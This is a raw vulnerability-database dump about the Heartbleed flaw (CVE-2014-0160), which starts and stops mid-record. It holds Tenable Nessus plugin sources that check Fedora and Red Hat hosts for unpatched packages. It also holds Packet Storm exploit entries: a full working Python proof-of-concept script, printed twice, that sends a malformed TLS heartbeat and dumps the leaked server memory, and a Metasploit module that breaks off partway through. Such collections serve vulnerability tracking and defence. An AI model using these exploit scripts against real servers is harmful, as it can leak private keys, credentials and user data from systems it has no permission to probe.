script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"openssl-1.0.1e-37.fc19.1\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-12T10:12:43", "description": "New upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care\nof OpenSSL,s TLS heartbeat read overrun (CVE-2014-0160).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2014-04-30T00:00:00", "title": "Fedora 20 : stunnel-5.01-1.fc20 (2014-5321)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:stunnel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-5321.NASL", "href": "https://www.tenable.com/plugins/nessus/73775", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5321.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73775);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2014-5321\");\n\n script_name(english:\"Fedora 20 : stunnel-5.01-1.fc20 (2014-5321)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care\nof OpenSSL,s TLS heartbeat read overrun (CVE-2014-0160).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132297.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6e63c49d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected stunnel package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:stunnel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"stunnel-5.01-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"stunnel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:15:40", "description": "The RPM installation of HP Version Control Agent (VCA) on the remote\nLinux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,\naffected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 26, "published": "2014-08-06T00:00:00", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:version_control_agent"], "id": "HP_VCA_SSRT101531-RHEL.NASL", "href": "https://www.tenable.com/plugins/nessus/77022", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77022);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The RPM installation of HP Version Control Agent (VCA) on the remote\nLinux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,\naffected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"ppc\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\n# These are the only versions the software is supported\n# however you can install it on later versions. So\n# only check non-supported versions if paranoia is on.\nif (\n report_paranoia < 2 &&\n !ereg(pattern:\"release [3-6]($|[^0-9])\", string:release)\n) audit(AUDIT_OS_NOT, \"Red Hat 3 / 4 / 5 / 6\");\n\nrpms = get_kb_item_or_exit(\"Host/RedHat/rpm-list\");\nif (\"hpvca-\" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HP Version Control Agent\");\n\n# Get the RPM version\nmatch = eregmatch(string:rpms, pattern:\"(^|\\n)hpvca-(\\d+\\.\\d+\\.\\d+-\\d+)\");\nif (isnull(match)) audit(AUDIT_VER_FAIL,\"HP Version Control Agent\");\n\nversion = match[2];\nversion = ereg_replace(string:version, replace:\".\", pattern:\"-\");\n\nfix = \"7.3.2.0\";\n\n# These specific version lines are affected\nif (\n version =~ \"^7\\.2\\.2\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"HP Version Control Agent\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:07", "description": "", "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "OpenSSL TLS Heartbeat Extension Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126065", "href": "https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126065/openssltls-disclose.txt"}, {"lastseen": "2016-12-05T22:16:50", "description": "", "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "Heartbleed Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126070", "href": "https://packetstormsecurity.com/files/126070/Heartbleed-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126070/ssltest.py.txt"}, {"lastseen": "2016-12-05T22:22:30", "description": "", "published": "2014-04-10T00:00:00", "type": "packetstorm", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "PACKETSTORM:126101", "href": "https://packetstormsecurity.com/files/126101/OpenSSL-Heartbeat-Heartbleed-Information-Leak.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \nCIPHER_SUITES = [ \n0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA \n0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA \n0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA \n0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA \n0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA \n0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA \n0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA \n0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA \n0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA \n0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA \n0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA \n0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA \n0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA \n0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA \n0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA \n0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA \n0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA \n0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA \n0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA \n0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA \n0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA \n0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA \n0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA \n0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA \n0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA \n0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA \n0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA \n0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA \n0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA \n0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA \n0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA \n0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA \n0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA \n0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA \n0x0096, # TLS_RSA_WITH_SEED_CBC_SHA \n0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA \n0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA \n0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA \n0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA \n0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA \n0x0005, # TLS_RSA_WITH_RC4_128_SHA \n0x0004, # TLS_RSA_WITH_RC4_128_MD5 \n0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA \n0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA \n0x0009, # TLS_RSA_WITH_DES_CBC_SHA \n0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA \n0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA \n0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA \n0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 \n0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5 \n0x00ff # Unknown \n] \n \nHANDSHAKE_RECORD_TYPE = 0x16 \nHEARTBEAT_RECORD_TYPE = 0x18 \nALERT_RECORD_TYPE = 0x15 \nTLS_VERSION = { \n'1.0' => 0x0301, \n'1.1' => 0x0302, \n'1.2' => 0x0303 \n} \n \nTTLS_CALLBACKS = { \n'SMTP' => :tls_smtp, \n'IMAP' => :tls_imap, \n'JABBER' => :tls_jabber, \n'POP3' => :tls_pop3 \n} \n \ndef initialize \nsuper( \n'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak', \n'Description' => %q{ \nThis module implements the OpenSSL Heartbleed attack. The problem \nexists in the handling of heartbeat requests, where a fake length can \nbe used to leak memory data in the response. Services that support \nSTARTTLS may also be vulnerable. \n}, \n'Author' => [ \n'Neel Mehta', # Vulnerability discovery \n'Riku', # Vulnerability discovery \n'Antti', # Vulnerability discovery \n'Matti', # Vulnerability discovery \n'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it. \n'FiloSottile', # PoC site and tool \n'Christian Mehlmauer', # Msf module \n'wvu', # Msf module \n'juan vazquez' # Msf module \n], \n'References' => \n[ \n['CVE', '2014-0160'], \n['US-CERT-VU', '720951'], \n['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'], \n['URL', 'http://heartbleed.com/'], \n['URL', 'https://github.com/FiloSottile/Heartbleed'], \n['URL', 'https://gist.github.com/takeshixx/10107280'], \n['URL', 'http://filippo.io/Heartbleed/'] \n], \n'DisclosureDate' => 'Apr 7 2014', \n'License' => MSF_LICENSE \n) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]), \nOptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ]) \n], self.class) \n \nend \n \ndef peer \n\"#{rhost}:#{rport}\" \nend \n \ndef tls_smtp \n# https://tools.ietf.org/html/rfc3207 \nsock.get_once \nsock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\") \nres = sock.get_once \n \nunless res && res =~ /STARTTLS/ \nreturn nil \nend \nsock.put(\"STARTTLS\\n\") \nsock.get_once \nend \n \ndef tls_imap \n# http://tools.ietf.org/html/rfc2595 \nsock.get_once \nsock.put(\"a001 CAPABILITY\\r\\n\") \nres = sock.get_once \nunless res && res =~ /STARTTLS/i \nreturn nil \nend \nsock.put(\"a002 STARTTLS\\r\\n\") \nsock.get_once \nend \n \ndef tls_pop3 \n# http://tools.ietf.org/html/rfc2595 \nsock.get_once \nsock.put(\"CAPA\\r\\n\") \nres = sock.get_once \nif res.nil? || res =~ /^-/ || res !~ /STLS/ \nreturn nil \nend \nsock.put(\"STLS\\r\\n\") \nres = sock.get_once \nif res.nil? || res =~ /^-/ \nreturn nil \nend \nres \nend \n \ndef tls_jabber \n# http://xmpp.org/extensions/xep-0035.html \nmsg = \"<?xml version='1.0' ?>\" \nmsg << \"<stream:stream xmlns='jabber:client' \" \nmsg << \"xmlns:stream='http://etherx.jabber.org/streams' \" \nmsg << \"version='1.0' \" \nmsg << \"to='#{datastore['XMPPDOMAIN']}'>\" \nsock.put(msg) \nres = sock.get 